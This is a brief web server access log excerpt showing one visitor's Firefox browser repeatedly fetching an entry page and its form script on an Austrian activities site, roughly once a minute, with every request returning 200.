77.119.161.159 - - [23/Apr/2025:12:17:27 +0200] "GET /gui/javascript/form_form.js?1745403447 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=403386" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:18:28 +0200] "GET /entry.php?id=10271&&ser=403447 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=403386" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:18:28 +0200] "GET /gui/javascript/form_form.js?1745403508 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=403447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:19:28 +0200] "GET /entry.php?id=10271&&ser=403508 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=403447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
